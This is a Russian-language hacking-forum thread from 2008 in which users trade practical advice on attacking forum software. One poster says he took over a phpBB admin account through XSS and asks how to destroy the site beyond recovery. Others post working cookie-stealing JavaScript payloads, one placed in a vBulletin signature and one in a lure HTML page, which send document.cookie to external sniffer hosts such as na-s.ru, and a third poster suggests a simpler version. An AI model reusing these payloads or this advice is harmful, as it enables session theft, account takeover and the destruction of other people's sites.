ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #71  
Старый 12.11.2008, 10:24
Аватар для lawyer
lawyer
Новичок
Регистрация: 23.09.2008
Сообщений: 1
Провел на форуме:
35048

Репутация: 1
По умолчанию

У меня тоже вопрос...
То что он ламерский, я понимаю...
Ну, вот, я нашел XSS на phpbb, получил куки, расшифровал пароль...
Зашел в админку... А дальше?
В моем случае мне надо угробить "сайт". (удалить все темы, удалить всех пользователей или сделать чтобы он вообще исчез...)
Пропалюсь я или нет - меня не колышет...
Просто, если что, как нормальный человек, админ сразу напишет в техподдержку, попробует бэкап и прочие откаты назад...
Как сделать так, чтобы восстановить форум не предоставлялось возможным?
 
Ответить с цитированием

  #72  
Старый 12.11.2008, 11:20
Аватар для NaX[no]rT
NaX[no]rT
Members of Antichat
Регистрация: 03.09.2005
Сообщений: 594
Провел на форуме:
3606217

Репутация: 685


Отправить сообщение для NaX[no]rT с помощью ICQ
По умолчанию

никак не сделаешь, если backup есть )
 
Ответить с цитированием

  #73  
Старый 12.11.2008, 21:03
Аватар для :{-VaigeR-}:
:{-VaigeR-}:
Новичок
Регистрация: 11.11.2008
Сообщений: 10
Провел на форуме:
16602

Репутация: 16
Отправить сообщение для :{-VaigeR-}: с помощью ICQ
По умолчанию

Цитата:
Сообщение от lawyer  
У меня тоже вопрос...
То что он ламерский, я понимаю...
Ну, вот, я нашел XSS на phpbb, получил куки, расшифровал пароль...
Зашел в админку... А дальше?
В моем случае мне надо угробить "сайт". (удалить все темы, удалить всех пользователей или сделать чтобы он вообще исчез...)
Пропалюсь я или нет - меня не колышет...
Просто, если что, как нормальный человек, админ сразу напишет в техподдержку, попробует бэкап и прочие откаты назад...
Как сделать так, чтобы восстановить форум не предоставлялось возможным?

Еси хост предостовляет улуги автомотического бекапа то не как, а большенство хостов их предоставляет)
 
Ответить с цитированием

  #74  
Старый 17.11.2008, 00:24
Аватар для Diablo
Diablo
Участник форума
Регистрация: 07.11.2005
Сообщений: 166
Провел на форуме:
565212

Репутация: 111
По умолчанию

Есть vBulletin 3.6.8.
Есть возможность использовать HMTL в подписи.
Что можно интересного сделать?
 
Ответить с цитированием

  #75  
Старый 18.11.2008, 00:56
Аватар для Diablo
Diablo
Участник форума
Регистрация: 07.11.2005
Сообщений: 166
Провел на форуме:
565212

Репутация: 111
По умолчанию

Ну раз интересного никто не посоветует, попробую просто пароли выведать. В подписи разместил скрипт
Цитата:
<script>img = new Image(); img.src = "http://domain.name/img.php?"+document.cookie;</script>
На сниффер приходять только bblastvisit, bblastactivity и bbthread_lastview (хмм). Хеша пароля нету, даже id юзера нету. Что за?
 
Ответить с цитированием

конвертер бд из vb в phpbb
  #76  
Старый 18.11.2008, 20:39
Аватар для mad_xakep
mad_xakep
Banned
Регистрация: 10.04.2007
Сообщений: 244
Провел на форуме:
2582771

Репутация: 264
Отправить сообщение для mad_xakep с помощью ICQ
По умолчанию конвертер бд из vb в phpbb

помоги плиз найти конвертер бд из vb в phpbb

просто спалили нулл над как нить базу перенести в другой двиг желатель в phpbb
и ваще это реально с вб куда либо базу конвертировать?
 
Ответить с цитированием

  #77  
Старый 18.11.2008, 20:47
Аватар для Jer1cho
Jer1cho
Участник форума
Регистрация: 06.06.2008
Сообщений: 162
Провел на форуме:
3942177

Репутация: 244
Отправить сообщение для Jer1cho с помощью ICQ
По умолчанию

http://www.phpbb.com/community/viewtopic.php?f=10&t=325692
google.com
 
Ответить с цитированием

XSS
  #78  
Старый 18.11.2008, 21:21
Аватар для NooB MC
NooB MC
Новичок
Регистрация: 18.11.2008
Сообщений: 7
Провел на форуме:
25855

Репутация: 0
По умолчанию XSS

У меня один вопрос.
Не как не могу получить долгожданные куки.

Кто в состоянии помочь мне в моей затеи.
Я не делаю просто запрос на картинку, я хочу внедрить сниффер в ХТМЛ документ сделаный мною, это для того что бы не какие фильтры не спасли.

Вот примерные наброски, но через этот способ мне приходит только инфа о IP, хосте,
тоесть всё кроме кукисов.

<html>
<head>
<title>"*******"</title>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=windows-1251">
</head>
<body>
<script language="JavaScript" type="text/javascript">
document.write("<img.src='http://na-s.ru/images/********_1.gif?' +document.cookie>");
document.title = "www.BU_GA_GA.ru";
window.status = "Пожалуйста подождите";
</script>
<body onload="LoadThisPage()";
<script language="JavaScript" type="text/javascript">
function LoadThisPage()
{
window.location.href = "http://na-s.ru/pictures/*********.jpg";
}
</script>
</body>
</html>
 
Ответить с цитированием

  #79  
Старый 18.11.2008, 21:35
Аватар для cash$$$
cash$$$
Banned
Регистрация: 06.01.2008
Сообщений: 413
Провел на форуме:
1301036

Репутация: 1334
Отправить сообщение для cash$$$ с помощью ICQ
По умолчанию

NooB MC

А не проще зделать так?

Код:
<script language=JavaScript>
document.images[0].src="http://sniff/sniff?"+document.cookie
</script>
 
Ответить с цитированием

  #80  
Старый 18.11.2008, 21:38
Аватар для NooB MC
NooB MC
Новичок
Регистрация: 18.11.2008
Сообщений: 7
Провел на форуме:
25855

Репутация: 0
По умолчанию

спасиба попробую, если что отпишусь.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[ *NIX ] Задай вопрос - получи ответ. Xszz *nix 1547 15.06.2010 15:41
ЕсТь ВоПрос Guma Чаты 4 26.10.2005 21:48



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ